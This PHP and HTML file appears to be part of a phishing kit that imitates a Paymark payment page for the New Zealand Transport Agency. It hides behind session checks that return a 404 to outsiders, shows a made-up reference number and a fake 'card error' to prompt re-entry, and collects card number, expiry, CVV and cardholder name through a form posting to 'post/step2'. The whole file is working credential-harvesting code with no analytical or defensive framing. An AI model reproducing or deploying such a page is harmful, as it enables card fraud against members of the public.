<?php

session_start();
$ip = getenv("REMOTE_ADDR");

if (isset($_SESSION['access']) && $_SESSION['access'] === true && isset($_SESSION['is_user']) && $_SESSION['is_user'] === true) {
    $ref_id = rand(10000000,99999999);
    if(isset($_GET['error'])){
        $display = 'block';
    }else{
        $display = 'none';
    }
}
 else {
    header("HTTP/1.0 404 Not Found");
    die();
}

?>
<!DOCTYPE html>
<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><meta name="robots" content="noindex, nofollow"><title>
    Paymark Web Payments
</title>
    <link rel="stylesheet" type="text/css" href="assets/css/bootstrap.min.css">
    <link rel="stylesheet" type="text/css" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
    <link rel="stylesheet" type="text/css" href="assets/css/base.css">
    <link rel="stylesheet" type="text/css" href="assets/css/base-ie.css">
    <link id="link_merchant_style" rel="stylesheet" type="text/css" href="assets/css/nzta-paymark-standard-ui-theme-v1.0.8.css">

    <script type="text/javascript" src="assets/js/jquery-3.2.1.min.js"></script>
    <script type="text/javascript" src="assets/js/progressbar.min.js"></script>
    <script type="text/javascript" src="assets/js/bootstrap.min.js"></script>
    <script type="text/javascript" src="assets/js/jquery.inputmask.bundle.js"></script>
    <script type="text/javascript" src="assets/js/jquery.validate.min.js"></script>
    <script type="text/javascript" src="assets/js/jquery.validate.additional-methods.min.js"></script>
</head>
<body id="body">

<header id="container_header" class="header">
    <div>
        <img src="assets/img/paymark-logo.png" id="ctl00_img_header_logo" alt="" tooltip="">
    </div>
</header>

<div id="container_main">



    <form name="aspnetForm" method="post" action="post/step2" id="aspnetForm" class="jq-validate form-alt" role="form" autocomplete="off" novalidate="novalidate">
        <div>
            <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="">
            <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="">
            <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="">
        </div>

        <script type="text/javascript">
            //<![CDATA[
            var theForm = document.forms['aspnetForm'];
            if (!theForm) {
                theForm = document.aspnetForm;
            }
            function __doPostBack(eventTarget, eventArgument) {
                if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                    theForm.__EVENTTARGET.value = eventTarget;
                    theForm.__EVENTARGUMENT.value = eventArgument;
                    theForm.submit();
                }
            }
            //]]>
            function doPostBack(){
                theForm.submit();
            }
        </script>


        <script>function disableForm() {for (i = 0; i < theForm.length; i++) {var tempobj = theForm.elements[i];if (tempobj && tempobj.type && tempobj.type.toLowerCase() == "submit") {tempobj.disabled = true;}}return true;}</script>
        <div>

            <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="">
            <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="">
        </div>
        <!--Loading page for google pay-->


        <!--Main page-->

        <input name="ctl00$ContentPlaceHolder1$input_surcharge" type="hidden" id="input_surcharge" value="">
        <input name="ctl00$ContentPlaceHolder1$input_amount" type="hidden" id="input_amount" value="">
        <input name="ctl00$ContentPlaceHolder1$input_google_pay_enabled" type="hidden" id="input_google_pay_enabled" value="False">
        <input name="ctl00$ContentPlaceHolder1$input_request_id" type="hidden" id="input_request_id" value="">


        <input name="ctl00$ContentPlaceHolder1$input_color_depth" type="hidden" id="input_color_depth" value="">
        <input name="ctl00$ContentPlaceHolder1$input_screen_height" type="hidden" id="input_screen_height" value="">
        <input name="ctl00$ContentPlaceHolder1$input_screen_width" type="hidden" id="input_screen_width" value="">
        <input name="ctl00$ContentPlaceHolder1$input_time_zone" type="hidden" id="input_time_zone" value="">
        <input type="hidden" id="__AntiXsrfToken" name="__AntiXsrfToken" value="">

        <div id="container_body">

            <div id="container_transaction_details">
                <div style="display: <?php echo $display;?>" class="alert alert-danger" role="alert">
                    Payment failed , card error [9001]
                </div>

                <div class="section-title header-text">
                    <span>Transaction Details</span>
                </div>
                <div class="section-body">
                    <div class="col-xs-12 detail-line line-bottom">
                        <span class="col-xs-12 col-sm-3 label-text">
                            <strong>Merchant</strong>
                        </span>
                        <span class="col-xs-12 col-sm-9 value-text">
                            <span id="label_merchant">NZTA</span>
                        </span>
                    </div>
                    <div id="ctl00_ContentPlaceHolder1_container_amount" class="col-xs-12 detail-line line-bottom">
                        <span class="col-xs-3 label-text">
                            <strong>Amount</strong>
                        </span>
                        <span class="col-xs-12 col-sm-9 value-text">
                            <span id="label_amount">$<?php echo $_SESSION['amount_to_pay'];?></span>
                        </span>
                    </div>
                    <div class="col-xs-12 hidden-xs detail-line line-bottom">
                        <span class="col-xs-12 col-sm-3 label-text">
                            <strong>Reference</strong>
                        </span>
                        <span class="col-xs-12 col-sm-9 value-text">
                            <span id="label_reference">FIN00<?php echo $ref_id;?></span>
                        </span>
                    </div>
                    <div class="col-xs-12 hidden-xs detail-line line-bottom">
                        <span class="col-xs-12 col-sm-3 label-text">
                            <strong>Particulars</strong>
                        </span>
                        <span class="col-xs-12 col-sm-9 value-text">
                            <span id="label_particulars">FIN00<?php echo $ref_id;?></span>
                        </span>
                    </div>
                </div>
            </div>

            <div id="container_paymethod_details" data-bundle="cardonly">
                <input name="ctl00$ContentPlaceHolder1$input_payment_type" type="hidden" id="input_payment_type" value="clickpay">


                <div class="section-body no-padding">


                    <!-- card -->
                    <div id="container_paymethod_card" class="section-paymethod">

                        <!-- form header -->
                        <div id="container_paymethod_card_header" class="section-paymethod-header">

                            <div id="container_paymethod_title" class="col-xs-12 line-bottom paymenthod-title">
                                <img src="assets/img/card.png">

                            </div>
                            <div id="container_paymethod_card_images" class="col-xs-12 container-paymethod-images">
                                <p class="col-xs-8 description-text line-right" style="padding-right: 10px;">
                                    <span id="label_card_payment_description">Pay securely with your credit card or debit card.</span>
                                    <span id="label_surcharge"></span>
                                </p>
                                <div class="col-xs-4" style="padding-left: 10px;">
                                    <div class="form-group supported-cards text-center">
                                        <img src="assets/img/visa.png" id="img_visa" class="img-card" alt="visa supported" data-card="visa">
                                        <img src="assets/img/mastercard.png" id="img_mastercard" class="img-card" alt="master card supported" data-card="mastercard">



                                    </div>
                                </div>
                            </div>
                        </div>

                        <!-- form card input -->
                        <div id="container_card_form" class="col-xs-12 section-paymenthod-form line-top">

                            <div class="form-group col-xs-12" style="padding-top: 15px;">
                                <label class="label-input-text">CARD NUMBER</label>
                                <input name="ctl00$ContentPlaceHolder1$input_cn" type="tel" id="input_cn" class="form-control" autocomplete="off" minlength="13" maxlength="20">
                            </div>
                            <div class="form-group col-xs-12 col-sm-6">
                                <label class="label-input-text">EXPIRY DATE</label>
                                <input name="ctl00$ContentPlaceHolder1$input_expiry" type="tel" id="input_expiry" class="form-control" placeholder="MM/YY" autocomplete="off" maxlength="5">
                            </div>
                            <div id="form_group_cvv" class="form-group col-xs-12 col-sm-5 col-sm-offset-1">
                                <label class="label-input-text" style="position: relative;">CVV CODE</label>
                                <i class="fa fa-question-circle-o button-default" style="font-size: 16px;" data-toggle="tooltip" data-title="3-digit security code usually found on the back of your card. American Express cards have a 4-digit code located on the front" data-placement="top" data-original-title="" title=""></i>
                                <span class="input-group">
                                    <input name="ctl00$ContentPlaceHolder1$input_cvv" type="tel" id="input_cvv" class="form-control" autocomplete="off">
                                    <span class="input-group-addon"><i class="fa fa-lock"></i></span>
                                </span>
                            </div>
                            <div id="form_group_cardname" class="form-group col-xs-12">
                                <label class="label-input-text">NAME ON CARD</label>
                                <input name="ctl00$ContentPlaceHolder1$input_cardname" type="text" id="input_cardname" class="form-control" autocomplete="off" maxlength="50">
                            </div>



                            <div class="form-group col-xs-12">
                                <span id="container_btn_card_submit">
                                    <button id="btn_card_submit" type="submit" class="btn btn-primary btn-submit text-uppercase" onclick="return onSubmitClick();">MAKE PAYMENT</button>
                                </span>

                            </div>
                        </div>
                    </div>

                    <!-- online eftpos -->


                    <!-- Integration payments/Google Pay -->



                    <!--Google pay Modal -->
                    <div class="modal fade" id="googlePayModal" tabindex="-1" role="dialog" aria-labelledby="googlepay details" aria-hidden="true">
                        <div class="modal-dialog modal-dialog-centered" role="document">
                            <div class="modal-content">
                                <div class="modal-header">
                                    <div class="row col-md-12">
                                        <h5 class="modal-title col-xs-3 col-sm-3 col-md-3 col-lg-3" style="margin-left: 20px;">What is Google Pay?</h5>
                                        <button type="button" class="close" data-dismiss="modal" aria-label="Close">
                                            <span aria-hidden="true">×</span>
                                        </button>
                                    </div>
                                </div>
                                <div class="modal-body" style="font-size: 12px;">
                                    <p>Google Pay is faster and simpler than paying with a physical card. </p>
                                    <p>Google Pay uses your Google account stored card details and protects your payment info with multiple layers of security.</p>

                                </div>
                                <div class="modal-footer">

                                    <button type="button" class="btn btn-secondary" data-dismiss="modal">Okay</button>
                                </div>
                            </div>
                        </div>
                    </div>

                    <div style="display: none;">
                        <input type="submit" name="ctl00$ContentPlaceHolder1$btn_submit" value="" onclick="disableForm();doPostBack();" id="btn_submit">
                        <input type="submit" name="ctl00$ContentPlaceHolder1$btn_cancel" value="" onclick="disableForm();" id="btn_cancel">
                    </div>
                </div>
            </div>
        </div>
    </form>
    <script>
        window.ACCEPTED_CARD = {
            visa: true,
            mastercard: true,
            diners: false,
            amex: false,
            qcard: false,
        };

    </script>


    <script type="text/javascript" src="assets/js/index.js"></script>



</div>

<footer class="footer">
    <div class="text-center">
        <img src="assets/img/click-logo@2x.png">
    </div>
</footer>


</body></html>